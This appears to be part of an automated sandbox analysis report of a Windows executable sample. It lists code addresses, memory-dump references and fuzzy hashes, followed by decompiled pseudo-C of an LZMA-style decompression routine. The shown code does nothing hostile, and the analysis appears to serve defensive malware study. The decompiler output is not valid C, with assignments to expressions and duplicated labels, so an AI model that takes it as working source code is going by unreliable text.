                                                0x0040718f
                                                0x00407191
                                                0x00407194
                                                0x00407195
                                                0x00407198
                                                0x0040719a
                                                0x0040719d
                                                0x0040719f
                                                0x004071a1
                                                0x004071a4
                                                0x004071a6
                                                0x004071a9
                                                0x004071ad
                                                0x004071af
                                                0x004071af
                                                0x004071b0
                                                0x004071b3
                                                0x004071b6
                                                0x00407178
                                                0x00407178
                                                0x00407180
                                                0x00407185
                                                0x00407187
                                                0x0040718a
                                                0x0040718a
                                                0x004071b9
                                                0x004071c0
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x00000000
                                                0x004071c2
                                                0x00000000
                                                0x004071c2
                                                0x004071c0
                                                0x004070d3
                                                0x004070d6
                                                0x004070d8
                                                0x004070db
                                                0x004070de
                                                0x004070e1
                                                0x004070e3
                                                0x004070e6
                                                0x004070e9
                                                0x004070e9
                                                0x004070ec
                                                0x004070ec
                                                0x004070ef
                                                0x004070f6
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x00000000
                                                0x004070f8
                                                0x00000000
                                                0x004070f8
                                                0x004070f6
                                                0x0040707c
                                                0x0040707f
                                                0x00407081
                                                0x00407084
                                                0x00000000
                                                0x00000000
                                                0x00406de3
                                                0x00406de3
                                                0x00406de7
                                                0x0040742c
                                                0x00000000
                                                0x0040742c
                                                0x00406ded
                                                0x00406df0
                                                0x00406df3
                                                0x00406df6
                                                0x00406df9
                                                0x00406dfc
                                                0x00406dff
                                                0x00406e01
                                                0x00406e04
                                                0x00406e07
                                                0x00406e0a
                                                0x00406e0c
                                                0x00406e0c
                                                0x00406e0c
                                                0x00000000
                                                0x00000000
                                                0x00406f6e
                                                0x00406f6e
                                                0x00406f72
                                                0x00407438
                                                0x00000000
                                                0x00407438
                                                0x00406f78
                                                0x00406f7b
                                                0x00406f7e
                                                0x00406f81
                                                0x00406f83
                                                0x00406f83
                                                0x00406f83
                                                0x00406f86
                                                0x00406f89
                                                0x00406f8c
                                                0x00406f8f
                                                0x00406f92
                                                0x00406f95
                                                0x00406f96
                                                0x00406f98
                                                0x00406f98
                                                0x00406f98
                                                0x00406f9b
                                                0x00406f9e
                                                0x00406fa1
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa7
                                                0x00406fa9
                                                0x00406fa9
                                                0x00000000
                                                0x00000000
                                                0x004071eb
                                                0x004071eb
                                                0x004071eb
                                                0x004071ef
                                                0x00000000
                                                0x00000000
                                                0x004071f5
                                                0x004071f8
                                                0x004071fb
                                                0x004071fe
                                                0x00407200
                                                0x00407200
                                                0x00407200
                                                0x00407203
                                                0x00407206
                                                0x00407209
                                                0x0040720c
                                                0x0040720f
                                                0x00407212
                                                0x00407213
                                                0x00407215
                                                0x00407215
                                                0x00407215
                                                0x00407218
                                                0x0040721b
                                                0x0040721e
                                                0x00407221
                                                0x00407224
                                                0x00407228
                                                0x0040722a
                                                0x0040722d
                                                0x00000000
                                                0x0040722f
                                                0x00406fac
                                                0x00406fac
                                                0x00000000
                                                0x00406fac
                                                0x0040722d
                                                0x00407462
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00407499
                                                0x00407499
                                                0x00000000
                                                0x00407499
                                                0x004072e6
                                                0x0040726d
                                                0x0040726a
                                                0x00000000
                                                0x00406ea1

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                                                • Instruction ID: 6da958b06032b63f13a44664be3ec753dd66a0d9f0ebc92e4dfa00afb32c2233
                                                • Opcode Fuzzy Hash: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                                                • Instruction Fuzzy Hash: 677123B1D04229CBDF24CFA8C8847ADBBF1FB44305F14816AE856B7281D7386A86DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E00406FBB() {
                                                				unsigned short _t531;
                                                				signed int _t532;
                                                				void _t533;
                                                				signed int _t534;
                                                				signed int _t535;
                                                				signed int _t565;
                                                				signed int _t568;
                                                				signed int _t589;
                                                				signed int* _t606;
                                                				void* _t613;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					if( *(_t613 - 0x40) != 0) {
                                                						 *(_t613 - 0x84) = 0xb;
                                                						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                						goto L132;
                                                					} else {
                                                						__eax =  *(__ebp - 0x28);
                                                						L88:
                                                						 *(__ebp - 0x2c) = __eax;
                                                						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                						L89:
                                                						__eax =  *(__ebp - 4);
                                                						 *(__ebp - 0x80) = 0x15;
                                                						__eax =  *(__ebp - 4) + 0xa68;
                                                						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                						L69:
                                                						 *(__ebp - 0x84) = 0x12;
                                                						while(1) {
                                                							L132:
                                                							 *(_t613 - 0x54) = _t606;
                                                							while(1) {
                                                								L133:
                                                								_t531 =  *_t606;
                                                								_t589 = _t531 & 0x0000ffff;
                                                								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                								if( *(_t613 - 0xc) >= _t565) {
                                                									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                									 *(_t613 - 0x40) = 1;
                                                									_t532 = _t531 - (_t531 >> 5);
                                                									 *_t606 = _t532;
                                                								} else {
                                                									 *(_t613 - 0x10) = _t565;
                                                									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                								}
                                                								if( *(_t613 - 0x10) >= 0x1000000) {
                                                									goto L139;
                                                								}
                                                								L137:
                                                								if( *(_t613 - 0x6c) == 0) {
                                                									 *(_t613 - 0x88) = 5;
                                                									L170:
                                                									_t568 = 0x22;
                                                									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                									_t535 = 0;
                                                									L172:
                                                									return _t535;
                                                								}
                                                								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                								L139:
                                                								_t533 =  *(_t613 - 0x84);
                                                								while(1) {
                                                									 *(_t613 - 0x88) = _t533;
                                                									while(1) {
                                                										L1:
                                                										_t534 =  *(_t613 - 0x88);
                                                										if(_t534 > 0x1c) {
                                                											break;
                                                										}
                                                										switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
                                                											case 0:
                                                												if( *(_t613 - 0x6c) == 0) {
                                                													goto L170;
                                                												}
                                                												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                												_t534 =  *( *(_t613 - 0x70));
                                                												if(_t534 > 0xe1) {
                                                													goto L171;
                                                												}
                                                												_t538 = _t534 & 0x000000ff;
                                                												_push(0x2d);
                                                												asm("cdq");
                                                												_pop(_t570);
                                                												_push(9);
                                                												_pop(_t571);
                                                												_t609 = _t538 / _t570;
                                                												_t540 = _t538 % _t570 & 0x000000ff;
                                                												asm("cdq");
                                                												_t604 = _t540 % _t571 & 0x000000ff;
                                                												 *(_t613 - 0x3c) = _t604;
                                                												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                													L10:
                                                													if(_t612 == 0) {
                                                														L12:
                                                														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                														goto L15;
                                                													} else {
                                                														goto L11;
                                                													}
                                                													do {
                                                														L11:
                                                														_t612 = _t612 - 1;
                                                														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                													} while (_t612 != 0);
                                                													goto L12;
                                                												}
                                                												if( *(_t613 - 4) != 0) {
                                                													GlobalFree( *(_t613 - 4)); // executed
                                                												}
                                                												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                												 *(_t613 - 4) = _t534;
                                                												if(_t534 == 0) {
                                                													goto L171;
                                                												} else {
                                                													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                													goto L10;
                                                												}
                                                											case 1:
                                                												L13:
                                                												__eflags =  *(_t613 - 0x6c);
                                                												if( *(_t613 - 0x6c) == 0) {
                                                													 *(_t613 - 0x88) = 1;
                                                													goto L170;
                                                												}
                                                												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                												_t45 = _t613 - 0x48;
                                                												 *_t45 =  *(_t613 - 0x48) + 1;
                                                												__eflags =  *_t45;
                                                												L15:
                                                												if( *(_t613 - 0x48) < 4) {
                                                													goto L13;
                                                												}
                                                												_t546 =  *(_t613 - 0x40);
                                                												if(_t546 ==  *(_t613 - 0x74)) {
                                                													L20:
                                                													 *(_t613 - 0x48) = 5;
                                                													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                													goto L23;
                                                												}
                                                												 *(_t613 - 0x74) = _t546;
                                                												if( *(_t613 - 8) != 0) {
                                                													GlobalFree( *(_t613 - 8)); // executed
                                                												}
                                                												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                												 *(_t613 - 8) = _t534;
                                                												if(_t534 == 0) {
                                                													goto L171;
                                                												} else {
                                                													goto L20;
                                                												}
                                                											case 2:
                                                												L24:
                                                												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                												 *(_t613 - 0x84) = 6;
                                                												 *(_t613 - 0x4c) = _t553;
                                                												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                												L132:
                                                												 *(_t613 - 0x54) = _t606;
                                                												goto L133;
                                                											case 3:
                                                												L21:
                                                												__eflags =  *(_t613 - 0x6c);
                                                												if( *(_t613 - 0x6c) == 0) {
                                                													 *(_t613 - 0x88) = 3;
                                                													goto L170;
                                                												}
                                                												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                												_t67 = _t613 - 0x70;
                                                												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                												__eflags =  *_t67;
                                                												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                												L23:
                                                												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                												if( *(_t613 - 0x48) != 0) {
                                                													goto L21;
                                                												}
                                                												goto L24;
                                                											case 4:
                                                												L133:
                                                												_t531 =  *_t606;
                                                												_t589 = _t531 & 0x0000ffff;
                                                												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                												if( *(_t613 - 0xc) >= _t565) {
                                                													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                													 *(_t613 - 0x40) = 1;
                                                													_t532 = _t531 - (_t531 >> 5);
                                                													 *_t606 = _t532;
                                                												} else {
                                                													 *(_t613 - 0x10) = _t565;
                                                													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                												}
                                                												if( *(_t613 - 0x10) >= 0x1000000) {
                                                													goto L139;
                                                												}
                                                											case 5:
                                                												goto L137;
                                                											case 6:
                                                												__edx = 0;
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 4);
                                                													__ecx =  *(__ebp - 0x38);
                                                													 *(__ebp - 0x34) = 1;
                                                													 *(__ebp - 0x84) = 7;
                                                													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                													while(1) {
                                                														L132:
                                                														 *(_t613 - 0x54) = _t606;
                                                														goto L133;
                                                													}
                                                												}
                                                												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                												__esi =  *(__ebp - 0x60);
                                                												__cl = 8;
                                                												__cl = 8 -  *(__ebp - 0x3c);
                                                												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                												__ecx =  *(__ebp - 0x3c);
                                                												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                												__ecx =  *(__ebp - 4);
                                                												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                												__eflags =  *(__ebp - 0x38) - 4;
                                                												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                												if( *(__ebp - 0x38) >= 4) {
                                                													__eflags =  *(__ebp - 0x38) - 0xa;
                                                													if( *(__ebp - 0x38) >= 0xa) {
                                                														_t98 = __ebp - 0x38;
                                                														 *_t98 =  *(__ebp - 0x38) - 6;
                                                														__eflags =  *_t98;
                                                													} else {
                                                														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                													}
                                                												} else {
                                                													 *(__ebp - 0x38) = 0;
                                                												}
                                                												__eflags =  *(__ebp - 0x34) - __edx;
                                                												if( *(__ebp - 0x34) == __edx) {
                                                													__ebx = 0;
                                                													__ebx = 1;
                                                													goto L61;
                                                												} else {
                                                													__eax =  *(__ebp - 0x14);
                                                													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                													__eflags = __eax -  *(__ebp - 0x74);
                                                													if(__eax >=  *(__ebp - 0x74)) {
                                                														__eax = __eax +  *(__ebp - 0x74);
                                                														__eflags = __eax;
                                                													}
                                                													__ecx =  *(__ebp - 8);
                                                													__ebx = 0;
                                                													__ebx = 1;
                                                													__al =  *((intOrPtr*)(__eax + __ecx));
                                                													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                													goto L41;
                                                												}
                                                											case 7:
                                                												__eflags =  *(__ebp - 0x40) - 1;
                                                												if( *(__ebp - 0x40) != 1) {
                                                													__eax =  *(__ebp - 0x24);
                                                													 *(__ebp - 0x80) = 0x16;
                                                													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                													__eax =  *(__ebp - 0x28);
                                                													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                													__eax =  *(__ebp - 0x2c);
                                                													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                													__eax = 0;
                                                													__eflags =  *(__ebp - 0x38) - 7;
                                                													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                													__al = __al & 0x000000fd;
                                                													__eax = (__eflags >= 0) - 1 + 0xa;
                                                													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                													__eax =  *(__ebp - 4);
                                                													__eax =  *(__ebp - 4) + 0x664;
                                                													__eflags = __eax;
                                                													 *(__ebp - 0x58) = __eax;
                                                													goto L69;
                                                												}
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x84) = 8;
                                                												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                												while(1) {
                                                													L132:
                                                													 *(_t613 - 0x54) = _t606;
                                                													goto L133;
                                                												}
                                                											case 8:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 4);
                                                													__ecx =  *(__ebp - 0x38);
                                                													 *(__ebp - 0x84) = 0xa;
                                                													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                												} else {
                                                													__eax =  *(__ebp - 0x38);
                                                													__ecx =  *(__ebp - 4);
                                                													__eax =  *(__ebp - 0x38) + 0xf;
                                                													 *(__ebp - 0x84) = 9;
                                                													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                												}
                                                												while(1) {
                                                													L132:
                                                													 *(_t613 - 0x54) = _t606;
                                                													goto L133;
                                                												}
                                                											case 9:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													goto L89;
                                                												}
                                                												__eflags =  *(__ebp - 0x60);
                                                												if( *(__ebp - 0x60) == 0) {
                                                													goto L171;
                                                												}
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                												__eflags = _t259;
                                                												0 | _t259 = _t259 + _t259 + 9;
                                                												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                												goto L76;
                                                											case 0xa:
                                                												goto L0;
                                                											case 0xb:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__ecx =  *(__ebp - 0x24);
                                                													__eax =  *(__ebp - 0x20);
                                                													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                												} else {
                                                													__eax =  *(__ebp - 0x24);
                                                												}
                                                												__ecx =  *(__ebp - 0x28);
                                                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                												goto L88;
                                                											case 0xc:
                                                												L99:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xc;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t334 = __ebp - 0x70;
                                                												 *_t334 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t334;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												__eax =  *(__ebp - 0x2c);
                                                												goto L101;
                                                											case 0xd:
                                                												L37:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xd;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t122 = __ebp - 0x70;
                                                												 *_t122 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t122;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												L39:
                                                												__eax =  *(__ebp - 0x40);
                                                												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                													goto L48;
                                                												}
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													goto L54;
                                                												}
                                                												L41:
                                                												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                												__ecx =  *(__ebp - 0x58);
                                                												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                												 *(__ebp - 0x48) = __eax;
                                                												__eax = __eax + 1;
                                                												__eax = __eax << 8;
                                                												__eax = __eax + __ebx;
                                                												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edx = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													 *(__ebp - 0x40) = 1;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													__ebx = __ebx + __ebx + 1;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edx;
                                                													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													goto L39;
                                                												} else {
                                                													goto L37;
                                                												}
                                                											case 0xe:
                                                												L46:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xe;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t156 = __ebp - 0x70;
                                                												 *_t156 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t156;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												while(1) {
                                                													L48:
                                                													__eflags = __ebx - 0x100;
                                                													if(__ebx >= 0x100) {
                                                														break;
                                                													}
                                                													__eax =  *(__ebp - 0x58);
                                                													__edx = __ebx + __ebx;
                                                													__ecx =  *(__ebp - 0x10);
                                                													__esi = __edx + __eax;
                                                													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                													__ax =  *__esi;
                                                													 *(__ebp - 0x54) = __esi;
                                                													__edi = __ax & 0x0000ffff;
                                                													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                													__eflags =  *(__ebp - 0xc) - __ecx;
                                                													if( *(__ebp - 0xc) >= __ecx) {
                                                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                														__cx = __ax;
                                                														_t170 = __edx + 1; // 0x1
                                                														__ebx = _t170;
                                                														__cx = __ax >> 5;
                                                														__eflags = __eax;
                                                														 *__esi = __ax;
                                                													} else {
                                                														 *(__ebp - 0x10) = __ecx;
                                                														0x800 = 0x800 - __edi;
                                                														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                														__ebx = __ebx + __ebx;
                                                														 *__esi = __cx;
                                                													}
                                                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                													 *(__ebp - 0x44) = __ebx;
                                                													if( *(__ebp - 0x10) >= 0x1000000) {
                                                														continue;
                                                													} else {
                                                														goto L46;
                                                													}
                                                												}
                                                												L54:
                                                												_t173 = __ebp - 0x34;
                                                												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                												__eflags =  *_t173;
                                                												goto L55;
                                                											case 0xf:
                                                												L58:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xf;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t203 = __ebp - 0x70;
                                                												 *_t203 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t203;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												L60:
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													L55:
                                                													__al =  *(__ebp - 0x44);
                                                													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                													goto L56;
                                                												}
                                                												L61:
                                                												__eax =  *(__ebp - 0x58);
                                                												__edx = __ebx + __ebx;
                                                												__ecx =  *(__ebp - 0x10);
                                                												__esi = __edx + __eax;
                                                												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													_t217 = __edx + 1; // 0x1
                                                													__ebx = _t217;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													goto L60;
                                                												} else {
                                                													goto L58;
                                                												}
                                                											case 0x10:
                                                												L109:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0x10;
                                                													goto L170;
